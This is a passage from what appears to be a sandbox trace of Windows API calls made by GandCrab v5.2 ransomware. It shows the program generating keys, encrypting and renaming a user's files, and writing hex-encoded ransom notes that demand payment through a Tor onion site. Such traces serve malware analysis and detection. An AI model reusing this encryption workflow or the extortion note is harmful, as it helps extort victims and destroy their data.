[0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="ntldr") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="NTDETECT.COM") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="Bootfont.bin") returned 1 [0093.667] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3") returned 56 [0093.667] lstrlenW (lpString=".mp3") returned 4 [0093.667] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.667] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0093.667] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.667] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.667] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\zver54ov-scrdxaj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.670] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.670] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.670] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.671] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.671] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.671] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.671] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.671] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.671] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.671] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.672] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.672] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.672] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.672] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.672] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.673] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.673] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.673] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.673] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503478) returned 1 [0093.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.674] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.674] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.674] GetLastError () returned 0x0 [0093.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.674] CryptDestroyKey (hKey=0x503478) returned 1 [0093.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.674] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.674] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.675] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.675] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5037b8) returned 1 [0093.675] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.675] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.675] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.675] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.676] GetLastError () returned 0x0 [0093.676] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.676] CryptDestroyKey (hKey=0x5037b8) returned 1 [0093.676] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.676] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.676] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.676] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.677] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x132a9, lpOverlapped=0x0) returned 1 [0093.686] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffecd57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x132a9, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x132a9, lpOverlapped=0x0) returned 1 [0093.687] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.687] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.688] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.692] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.692] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.693] CloseHandle (hObject=0x2b4) returned 1 [0093.693] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\zver54ov-scrdxaj.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\zver54ov-scrdxaj.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0093.694] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.694] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0093.694] FindClose (in: hFindFile=0x5032f8 | out: hFindFile=0x5032f8) returned 1 [0093.695] CloseHandle (hObject=0x2ac) returned 1 [0093.695] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0093.695] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0093.695] CloseHandle (hObject=0x230) returned 1 [0093.695] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.695] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0093.695] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0093.695] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="My Documents" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents") returned="C:\\Users\\CIiHmnxMn6Ps\\My Documents" [0093.695] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\") returned="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\" [0093.695] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.696] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.696] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.696] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.696] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.696] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.697] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.697] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\\\TITWMVJL-DECRYPT.txt") returned 56 [0093.697] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\my documents\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0093.697] GetLastError () returned 0x50 [0093.697] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.697] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.698] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x5)) [0093.698] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.698] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.698] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.698] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\d2ca4a09d2ca4deb61a.lock") returned 59 [0093.698] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\my documents\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0093.698] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.699] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.699] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\") returned 35 [0093.699] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\*" [0093.699] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0093.699] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0093.700] CloseHandle (hObject=0x230) returned 1 [0093.700] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.700] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0093.700] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0093.700] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NetHood" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood") returned="C:\\Users\\CIiHmnxMn6Ps\\NetHood" [0093.700] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\") returned="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\" [0093.700] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.700] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.701] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.701] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.701] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.701] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.701] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.702] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\\\TITWMVJL-DECRYPT.txt") returned 51 [0093.702] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\nethood\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0093.702] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\